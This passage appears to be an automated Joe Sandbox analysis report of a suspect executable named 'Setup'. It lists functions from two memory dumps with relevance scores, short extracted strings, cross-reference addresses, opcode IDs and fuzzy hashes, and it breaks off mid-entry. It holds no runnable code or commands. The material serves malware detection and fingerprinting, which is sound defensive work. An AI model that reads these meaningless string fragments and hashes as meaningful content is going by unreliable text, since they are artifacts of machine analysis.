EC, xrefs: 00F9F484
N, xrefs: 00F9F818

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 705$..70$;6=2$EC$F$N
API String ID: 0-1390691857
Opcode ID: f50e1a731abf381cd6f151d4726570c6a1e31f27433472180e76934dac9b8db9
Instruction ID: e7e77c441b976f6813a442652592d9e163958578cc11155e11e0f8842eff3296
Opcode Fuzzy Hash: f50e1a731abf381cd6f151d4726570c6a1e31f27433472180e76934dac9b8db9
Instruction Fuzzy Hash: 8052387590C3918BDB25CF28C84166FBBE1AFD1324F18867CE8D48B392D7758909DB92

Function 031E132E Relevance: 8.0, Strings: 6, Instructions: 522COMMON

Download Yara Rule

Strings

", xrefs: 031E1562
}, xrefs: 031E16B2
<, xrefs: 031E18F6
_, xrefs: 031E13B8
d, xrefs: 031E1836
[, xrefs: 031E1345

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: "$<$[$_$d$}
API String ID: 0-4270223103
Opcode ID: 544232ae841d817d5893fcffebec792d5e5bbee9eaa6df2e295a38f8c01356cc
Instruction ID: 14ab2f9fda8ab0f6fdea4b4c0b0ff790f3e03fea7d0f453661a9abcbb6e55fb1
Opcode Fuzzy Hash: 544232ae841d817d5893fcffebec792d5e5bbee9eaa6df2e295a38f8c01356cc
Instruction Fuzzy Hash: FA226075A0C7809BD768DF38C4903AEBBE1ABC9220F198A6DD4DA87391D7358941CB42

Function 00F92B5A Relevance: 8.0, Strings: 6, Instructions: 522COMMON

Download Yara Rule

Strings

d, xrefs: 00F93062
_, xrefs: 00F92BE4
", xrefs: 00F92D8E
}, xrefs: 00F92EDE
[, xrefs: 00F92B71
<, xrefs: 00F93122

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "$<$[$_$d$}
API String ID: 0-4270223103
Opcode ID: 16aa819c96d65378c585e553c388c74e6d584524459cc83fe5cb2430be56a973
Instruction ID: 90e8f6bbd0c4ac61e95941df9d001031d233b1d3162cb7e78a32a274ced35c12
Opcode Fuzzy Hash: 16aa819c96d65378c585e553c388c74e6d584524459cc83fe5cb2430be56a973
Instruction Fuzzy Hash: 6A22947160C7808FDB64DF38C8953AEBBE1ABD5324F198A2DE4D987391D6348941EB43

Function 031D8E40 Relevance: 7.8, Strings: 6, Instructions: 254COMMON

Download Yara Rule

Strings

ptzu, xrefs: 031D8EF1
Vi, xrefs: 031D8F21
uxHp, xrefs: 031D8EE1
~L@E, xrefs: 031D8EF9
{=%{, xrefs: 031D8EE9
wuAw, xrefs: 031D8F11

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: Vi$ptzu$uxHp$wuAw${=%{$~L@E
API String ID: 0-2292347137
Opcode ID: 7b9ef7e4b19e3d76aa3d509f3eaa83661429921d4e30dd0df4b1a76a15b12fb9
Instruction ID: 738bdfdcc392890758d7d0dd16f1a5530c92bab7e945d9fe5bd368a87230dc17
Opcode Fuzzy Hash: 7b9ef7e4b19e3d76aa3d509f3eaa83661429921d4e30dd0df4b1a76a15b12fb9
Instruction Fuzzy Hash: 8C61F02024D3D28BC311DF3A90A076BFFE1AF97250F0C85ADE4D44B286D329851997A6

Function 00F8A66C Relevance: 7.8, Strings: 6, Instructions: 254COMMON

Download Yara Rule

Strings

ptzu, xrefs: 00F8A71D
~L@E, xrefs: 00F8A725
Vi, xrefs: 00F8A74D
uxHp, xrefs: 00F8A70D
wuAw, xrefs: 00F8A73D
{=%{, xrefs: 00F8A715

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: Vi$ptzu$uxHp$wuAw${=%{$~L@E
API String ID: 0-2292347137
Opcode ID: 7b9ef7e4b19e3d76aa3d509f3eaa83661429921d4e30dd0df4b1a76a15b12fb9
Instruction ID: 467fd053b4cd5fc42551ff702e7fed523b4bbcb9cf859d7cefa4ac61968c621d
Opcode Fuzzy Hash: 7b9ef7e4b19e3d76aa3d509f3eaa83661429921d4e30dd0df4b1a76a15b12fb9
Instruction Fuzzy Hash: 0261F860A4D3C28AE3119F3584A07ABFFE0DFA3360F0C456EE4D54B246D335891AA767

Function 031D9580 Relevance: 6.6, Strings: 5, Instructions: 359COMMON

Download Yara Rule

Strings

E, xrefs: 031D97B0
O, xrefs: 031D9716
Kt, xrefs: 031D9834
Gz, xrefs: 031D983C
!, xrefs: 031D9953

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: !$E$Gz$Kt$O
API String ID: 0-1750267231
Opcode ID: 129861d26432a358705f6464fa6716f7332f1f6b42b395601d652e325b2a98f9
Instruction ID: aa7948d90acd16226d5394152d70bb6501157eb878da677fd721d6ec6ce6f4f4
Opcode Fuzzy Hash: 129861d26432a358705f6464fa6716f7332f1f6b42b395601d652e325b2a98f9
Instruction Fuzzy Hash: 8CB103B560C7808BD318DF35D890AAFBBE6EFD6214F18496CE5D58B281D738C50ACB52

Function 00F8ADAC Relevance: 6.6, Strings: 5, Instructions: 359COMMON

Download Yara Rule

Strings

Kt, xrefs: 00F8B060
!, xrefs: 00F8B17F
E, xrefs: 00F8AFDC
Gz, xrefs: 00F8B068
O, xrefs: 00F8AF42

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !$E$Gz$Kt$O
API String ID: 0-1750267231
Opcode ID: 1ea70ce4ccbd52f5ebfed9b53be9e8cf8e831dd5474308b0635f676ed1f72ed0
Instruction ID: d4ca701708ef52d1907198b1d84f20f2e0f735f53957b337d6a57a07f6ddaafd
Opcode Fuzzy Hash: 1ea70ce4ccbd52f5ebfed9b53be9e8cf8e831dd5474308b0635f676ed1f72ed0
Instruction Fuzzy Hash: B5B1EFB160C7408BE714EF25C855AABBBE5EFD2324F184A6DF5D18B281D738850ACB16

Function 031EC03A Relevance: 6.5, Strings: 5, Instructions: 207COMMON

Download Yara Rule

Strings

VW, xrefs: 031EC1B0
~rB!, xrefs: 031EC0F9
n#K%, xrefs: 031EC1D2
j/1Q, xrefs: 031EC1A0
KM, xrefs: 031EC20C

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: VW$j/1Q$n#K%$~rB!$KM
API String ID: 0-1003587301
Opcode ID: bac0e86619430b44f4394c79666f957d2b513b783cdfdd6ac8afc0bef879817f
Instruction ID: 16bb2af20d9ec4736acabb31785c81b2a4b5751a4ec2b061614d877e1d64798a
Opcode Fuzzy Hash: bac0e86619430b44f4394c79666f957d2b513b783cdfdd6ac8afc0bef879817f
Instruction Fuzzy Hash: FB710CB654C3409FD304DF66984199FBFE2EFD2305F188C6CE0D49B255DA39CA099B86

Function 00F9D866 Relevance: 6.5, Strings: 5, Instructions: 207COMMON

Download Yara Rule

Strings

n#K%, xrefs: 00F9D9FE
KM, xrefs: 00F9DA38
~rB!, xrefs: 00F9D925
j/1Q, xrefs: 00F9D9CC
VW, xrefs: 00F9D9DC

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: VW$j/1Q$n#K%$~rB!$KM
API String ID: 0-1003587301
Opcode ID: e53c140b061fc095275afa7af1258950167901b86aed297f9d2011ad7e6a85d1
Instruction ID: e52998963ba020f99905b9d69a387df3234c61d54a8073eebb2b495ddee76f75
Opcode Fuzzy Hash: e53c140b061fc095275afa7af1258950167901b86aed297f9d2011ad7e6a85d1
Instruction Fuzzy Hash: 5471DCB255C3409BE7059F66885195FBFE2EFD2304F18882CE0C487356DA39CA099B96

Function 00F8FAFD Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

B, xrefs: 00F8FB09
X, xrefs: 00F8FCA7
!%, xrefs: 00F8FAFF
%V, xrefs: 00F8FC9C
rg, xrefs: 00F8FB6F

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !%$%V$B$X$rg
API String ID: 0-1800674655
Opcode ID: 19b84d581932cf2d385a8253674ae8e1829070b119135886f65f8cf0552ef655
Instruction ID: 910e13f73835b55ca22638bc1c62b54ae8bd2d2ecfa4b1b8c12bb0bf55159e65
Opcode Fuzzy Hash: 19b84d581932cf2d385a8253674ae8e1829070b119135886f65f8cf0552ef655
Instruction Fuzzy Hash: 03514A717183414BD7289B389C527EFBBD2EBDA324F185A3CD0C9C7292E7384416975A

Function 00FAC950 Relevance: 6.0, Strings: 4, Instructions: 976COMMON

Download Yara Rule

Strings

{fby, xrefs: 00FAD03C
[, xrefs: 00FAD42A
J, xrefs: 00FAD118
>XV{, xrefs: 00FACC8E

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: >XV{$J$[${fby
API String ID: 0-3606238112
Opcode ID: 7d31cc63ff5770695c31b1e43ba50890859d631cefc6034410afff56c316ae69
Instruction ID: 6e574e4bbd9767cda0cea5e66ba21103b261472c32d63943d41579fa7f13e3e9
Opcode Fuzzy Hash: 7d31cc63ff5770695c31b1e43ba50890859d631cefc6034410afff56c316ae69
Instruction Fuzzy Hash: 9C524A61A0C3D08ED725CF2984507ABBBD29FD7354F1889ADD4C99B382C739480AD7A7

Function 00F8F407 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

4, xrefs: 00F8F431
9n`, xrefs: 00F8F65C
Z&\, xrefs: 00F8F6D5
RT, xrefs: 00F8F6EB

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 4$9n`$RT$Z&\
API String ID: 0-3901044890
Opcode ID: 6c7a7660437f6c0f21dc20b944d81a85548479a9af2a8b5da81e82defa74b55a
Instruction ID: 2265c824faac872acc31fe80c72b3fc08f55bb949c2b3880e6aa1775957e32cd
Opcode Fuzzy Hash: 6c7a7660437f6c0f21dc20b944d81a85548479a9af2a8b5da81e82defa74b55a
Instruction Fuzzy Hash: 9EA1DF7190C3D08FD7369F2984A17EBBFE1ABA6310F18496CC0C99B256D735450ACB96

Function 031FA216 Relevance: 5.3, Strings: 4, Instructions: 286COMMON

Download Yara Rule

Strings

nu, xrefs: 031FC686
V, xrefs: 031FC690
'=>, xrefs: 031FC579
16, xrefs: 031FC7D7

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: '=>$16$V$nu
API String ID: 0-1128639114
Opcode ID: 7f3c9dd332acdd1c46de2716c611b3868ceb9de1070349c11e77ecbbf974c280
Instruction ID: 17e68c5c521b1063fb524f3b6e576b85bb7e9afa5130da8538e762301f510cad
Opcode Fuzzy Hash: 7f3c9dd332acdd1c46de2716c611b3868ceb9de1070349c11e77ecbbf974c280
Instruction Fuzzy Hash: 4E81147560C3908FD325CF2994907ABBBE2AFD7310F18995DD5C94B382DB79440A8B93

Function 00FABA42 Relevance: 5.3, Strings: 4, Instructions: 286COMMON

Download Yara Rule

Strings

16, xrefs: 00FAE003
nu, xrefs: 00FADEB2
V, xrefs: 00FADEBC
'=>, xrefs: 00FADDA5

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: '=>$16$V$nu
API String ID: 0-1128639114
Opcode ID: f3bf3c92426298d4e2d064f40d1e5b6cdb2c1ecb3f2719942d97017e2aab000f
Instruction ID: abe97b1db70da3796d77b0a6d4516b9f342f72cdc4a76a41e9aa32e9621e568e
Opcode Fuzzy Hash: f3bf3c92426298d4e2d064f40d1e5b6cdb2c1ecb3f2719942d97017e2aab000f
Instruction Fuzzy Hash: EE8126B560C3908FD324CF2594907ABBBE2AFE7310F18895CD4DA4B782D779480A9B57

Function 031FAD95 Relevance: 5.3, Strings: 4, Instructions: 285COMMON

Download Yara Rule

Strings

nu, xrefs: 031FC686
V, xrefs: 031FC690
'=>, xrefs: 031FC579
16, xrefs: 031FC7D7

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: '=>$16$V$nu
API String ID: 0-1128639114
Opcode ID: 1c5827dba570397cccfe606727be756af8f117ec02439b961655dc2819c2b455
Instruction ID: 9cbf36a5cc161a13f038558ac56575877bb1077edda9ec3415125622a0d5842e
Opcode Fuzzy Hash: 1c5827dba570397cccfe606727be756af8f117ec02439b961655dc2819c2b455
Instruction Fuzzy Hash: 6681037560C3908FD325CF2994907A7BBD2AFD7310F18995DD5C98B382DB79440A8B93

Function 00FAC5C1 Relevance: 5.3, Strings: 4, Instructions: 285COMMON

Download Yara Rule

Strings

16, xrefs: 00FAE003
nu, xrefs: 00FADEB2
V, xrefs: 00FADEBC
'=>, xrefs: 00FADDA5

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: '=>$16$V$nu
API String ID: 0-1128639114
Opcode ID: bc11d363afe62b07cb49c86be68f9e487ccdbd0c6e2bea18ed24ae1df90e0bbf
Instruction ID: 74363bf0284c2eb9a7468e00ba4bee60792007dddff406c23ed36ee2f9845847
Opcode Fuzzy Hash: bc11d363afe62b07cb49c86be68f9e487ccdbd0c6e2bea18ed24ae1df90e0bbf
Instruction Fuzzy Hash: 278116B560C3908FD324CF2594907A7BBE29FE3310F18895DD4DA4B782D779480A9B57

Function 031FC558 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

nu, xrefs: 031FC686
V, xrefs: 031FC690
'=>, xrefs: 031FC579
16, xrefs: 031FC7D7

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: '=>$16$V$nu
API String ID: 0-1128639114
Opcode ID: 78c1f39499efe5364a69f1c5b0645004879ded2a161b1c9b8aba8bee407129d1
Instruction ID: 28607bdd7a8519734fd47a5b2dcb697b07c55798d3ee067d916b4fb160f6e695
Opcode Fuzzy Hash: 78c1f39499efe5364a69f1c5b0645004879ded2a161b1c9b8aba8bee407129d1
Instruction Fuzzy Hash: 6C81E07560C3908FD325CF2994907ABBBE2AFD7310F18999DD5C94B382DB79440A8B93

Function 00FADD84 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

16, xrefs: 00FAE003
nu, xrefs: 00FADEB2
V, xrefs: 00FADEBC
'=>, xrefs: 00FADDA5

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: '=>$16$V$nu
API String ID: 0-1128639114
Opcode ID: 487e56f2f99d0d71953ae3d445678fc3b11199eecb4fb6621a62cf3dec5dcae6
Instruction ID: bccc193171bbc466427d5066c4ba09993110326932ad639802905913fd157e00
Opcode Fuzzy Hash: 487e56f2f99d0d71953ae3d445678fc3b11199eecb4fb6621a62cf3dec5dcae6
Instruction Fuzzy Hash: A48116B560C3D08FD3248F2598907ABBBE29FE3310F18895CD5DA4B782D779480A9B57

Function 03209E20 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

y+~-, xrefs: 03209E5B
c'Z), xrefs: 03209E53
W#W%, xrefs: 03209E85
VW, xrefs: 03209E73

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: VW$W#W%$c'Z)$y+~-
API String ID: 0-1970231293
Opcode ID: d4d4e343c8caaf323b630251e6fb0c0dd342fe2b9723a1ee1cf925f8dee0391a
Instruction ID: 8250883e134f8a7b649e3cdd483dd5bbfaadac5420f4b381233ee0db2d114125
Opcode Fuzzy Hash: d4d4e343c8caaf323b630251e6fb0c0dd342fe2b9723a1ee1cf925f8dee0391a
Instruction Fuzzy Hash: 7501D6B19183019BD708EF35BD5691FBBF19B91200F18C52CD448D7356DA38C1098B46

Function 00FBB64C Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

y+~-, xrefs: 00FBB687
c'Z), xrefs: 00FBB67F
VW, xrefs: 00FBB69F
W#W%, xrefs: 00FBB6B1

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: VW$W#W%$c'Z)$y+~-
API String ID: 0-1970231293
Opcode ID: bb0cdee7da41b0be4e3859c4e782e4c505f8c8e04fa33eb067c53a3a967b4612
Instruction ID: da11c857bbfd967b1a0b3a7d58e54b604c64e0e74012083936f461d1bfccae67
Opcode Fuzzy Hash: bb0cdee7da41b0be4e3859c4e782e4c505f8c8e04fa33eb067c53a3a967b4612
Instruction Fuzzy Hash: B10192B59183009BD708DF36AC1295FBBF1AB82710F08CA3CE448D7351E778910A8B4A

Function 032091B0 Relevance: 4.4, Strings: 3, Instructions: 614COMMON

Download Yara Rule

Strings

f, xrefs: 032093C0
LKJI, xrefs: 032091EC
LKJI, xrefs: 03209464

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: InitializeThunk
String ID: LKJI$LKJI$f
API String ID: 2994545307-510723025
Opcode ID: 06b125ea0aeebc90bf19ded5e23a41ba0026ffabda7a55ed1b5dc21a5c55f7e5
Instruction ID: 824186a84f5cacf2e3f51eaff34c5857d548a07cbe8a3acb46a550efc09b0c84
Opcode Fuzzy Hash: 06b125ea0aeebc90bf19ded5e23a41ba0026ffabda7a55ed1b5dc21a5c55f7e5
Instruction Fuzzy Hash: 7322F4716183418FD718CF28C89072FBBE2BBD5314F18866CE5968B2E3D7349989CB81

Function 00FBA9DC Relevance: 4.4, Strings: 3, Instructions: 614COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00FBAA18
f, xrefs: 00FBABEC
LKJI, xrefs: 00FBAC90

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: LKJI$LKJI$f
API String ID: 0-510723025
Opcode ID: acacbb409100f87f9e895a1e95ac7b7bb5a1cd455ef8c2aef2f99277db263143
Instruction ID: 8cc4d04cbb7c13700aaf2881b7418a9d0e67953c6b5697b02607d6f8932845ee
Opcode Fuzzy Hash: acacbb409100f87f9e895a1e95ac7b7bb5a1cd455ef8c2aef2f99277db263143
Instruction Fuzzy Hash: EB220471A083418FD718CF29C891BBFBBE2BBD5324F18862CE5A58B291D774D9059F42

Function 03206490 Relevance: 4.3, Strings: 3, Instructions: 505COMMON

Download Yara Rule

Strings

LKJI, xrefs: 032064D0
LKJI, xrefs: 0320698B, 0320667A
LKJI, xrefs: 03206690

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: LKJI$LKJI$LKJI
API String ID: 0-3388204962
Opcode ID: f2d7038474ca3054945e53023ec0b30f0b48419202ef7aeeef818c1b6659a45e
Instruction ID: 78d8811f10125217604d435c6b53e573448fd7a1bbe453655265ad393d9aabe7
Opcode Fuzzy Hash: f2d7038474ca3054945e53023ec0b30f0b48419202ef7aeeef818c1b6659a45e
Instruction Fuzzy Hash: E8D18876B283194BD324DE24D8C073BF7A2EBC5214F0DC62CE995576CADB70E8498792

Function 00FB7CBC Relevance: 4.3, Strings: 3, Instructions: 505COMMON

Download Yara Rule

Strings

LKJI, xrefs: 00FB7CFC
LKJI, xrefs: 00FB81B7, 00FB7EA6
LKJI, xrefs: 00FB7EBC

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: LKJI$LKJI$LKJI
API String ID: 0-3388204962
Opcode ID: 1ec583ab164f6c1556c102cc5ae013ecf340f39d3ded54312c973fc164c0dcd3
Instruction ID: bacb4f291e675e6ee87bf2468d5420daf14959bcb594be54d4d90d3697c0a616
Opcode Fuzzy Hash: 1ec583ab164f6c1556c102cc5ae013ecf340f39d3ded54312c973fc164c0dcd3
Instruction Fuzzy Hash: 56D17A76F083148BD324EE26CC806BBB7A6EBC5350F09C62CE99553285DB30DC05EB96

Function 00FAD4E0 Relevance: 4.2, Strings: 3, Instructions: 400COMMON

Download Yara Rule

Strings

WZ8j, xrefs: 00FAD6A3
EIlR, xrefs: 00FAD50C
7, xrefs: 00FAD4F6

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 7$EIlR$WZ8j
API String ID: 0-984579390
Opcode ID: 3f63f485f4ac31c04650acf49e94aa88dca9e6c05c429464dd81444cc50124ae
Instruction ID: 751d64bc9088b5c9b9c85c982a401cc45b3e17af1726b46bab20657d72311276
Opcode Fuzzy Hash: 3f63f485f4ac31c04650acf49e94aa88dca9e6c05c429464dd81444cc50124ae
Instruction Fuzzy Hash: 18C12871A0C3D18ED739CF2984507ABBBE19FD7304F1889ADC4CA9B252DB394509CB56

Function 031EC336 Relevance: 4.1, Strings: 3, Instructions: 331COMMON

Download Yara Rule

Strings

)G+I, xrefs: 031EC385
+K M, xrefs: 031EC38D
no, xrefs: 031EC3D5

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: )G+I$+K M$no
API String ID: 0-2686707276
Opcode ID: 6d6567a0d2a90b5ab908cbf14cc5125b6097dc2dea4351fe34ec034a3fdbf3a9
Instruction ID: fe5ef10b94b8897b1db29801c565fb5ee14051322a2da3640fe3654982698936
Opcode Fuzzy Hash: 6d6567a0d2a90b5ab908cbf14cc5125b6097dc2dea4351fe34ec034a3fdbf3a9
Instruction Fuzzy Hash: 1BA104B6A187148BC714DF28CC9176BB7E1EF99314F08996CE8D68B385E378D904C786

Function 00F9DB62 Relevance: 4.1, Strings: 3, Instructions: 331COMMON

Download Yara Rule

Strings

+K M, xrefs: 00F9DBB9
no, xrefs: 00F9DC01
)G+I, xrefs: 00F9DBB1

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )G+I$+K M$no
API String ID: 0-2686707276
Opcode ID: b4cbebb84a1d4af78231c941b4e5bd542976c4dd01d6993bcff43f9e61672fa1
Instruction ID: 571886228f3912198df7725bb39f5fd38c42d553ba1fdf2011d0278e36da74dd
Opcode Fuzzy Hash: b4cbebb84a1d4af78231c941b4e5bd542976c4dd01d6993bcff43f9e61672fa1
Instruction Fuzzy Hash: 0AA1F671A183158BDB14DF28CC9176BB7E1EF95324F18892CE8C58B391E3B8D904D75A

Function 031E5326 Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

gfff, xrefs: 031E54D7
{|, xrefs: 031E542B
LKJI, xrefs: 031E55A0

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: LKJI$gfff${|
API String ID: 0-268380964
Opcode ID: e2932029d521165bc0de245b65d8cff57335634f1c05e85407c53d97f0b54a3d
Instruction ID: 265e6e8e77aa0ff957f31acab00219e0728862682a8ffa89ff99686e27ffb364
Opcode Fuzzy Hash: e2932029d521165bc0de245b65d8cff57335634f1c05e85407c53d97f0b54a3d
Instruction Fuzzy Hash: E87135716047008FD728CF28D851BAFB7E2EBC9304F49896DD086CB296DB78D945CB81

Function 00F96B52 Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

gfff, xrefs: 00F96D03
LKJI, xrefs: 00F96DCC
{|, xrefs: 00F96C57

Memory Dump Source

Source File: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: LKJI$gfff${|
API String ID: 0-268380964
Opcode ID: ea591ec0091a5d39d109636534969988378e26aa148003b9be1a2cacececfd8d
Instruction ID: a5de1714cbbd1a333fe011ae6bb9c1624571feea7e896a0befd5806a5e3d24a2
Opcode Fuzzy Hash: ea591ec0091a5d39d109636534969988378e26aa148003b9be1a2cacececfd8d
Instruction Fuzzy Hash: 40712675A042018FEB28CF28D851BAE77E2EBC5310F09857DE086CB395DB78D945DB85

Function 031FA615 Relevance: 4.0, Strings: 3, Instructions: 209COMMON

Download Yara Rule

Strings

,* ^, xrefs: 031FA62C
./, xrefs: 031FA8DD
q#v%, xrefs: 031FA8BC

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID:
String ID: ,* ^$./$q#v%
API String ID: 0-217856844
Opcode ID: 78c2061e3781c217b93b16ad46885d240461bc4a3296a2668bb12539f157ccf2
Instruction ID: aa165cb4c0d69f6065c07798df10b53fce4672e2b45648516b6af31ff2614d50
Opcode Fuzzy Hash: 78c2061e3781c217b93b16ad46885d240461bc4a3296a2668bb12539f157ccf2
Instruction Fuzzy Hash: 1D61B1716083C18FD329CF2584607ABBBE1AFD7204F18896DC5CA5B242DB79554A8B46

Function 00FABE41 Relevance: 4.0, Strings: 3, Instructions: 209COMMON

Download Yara Rule

Strings

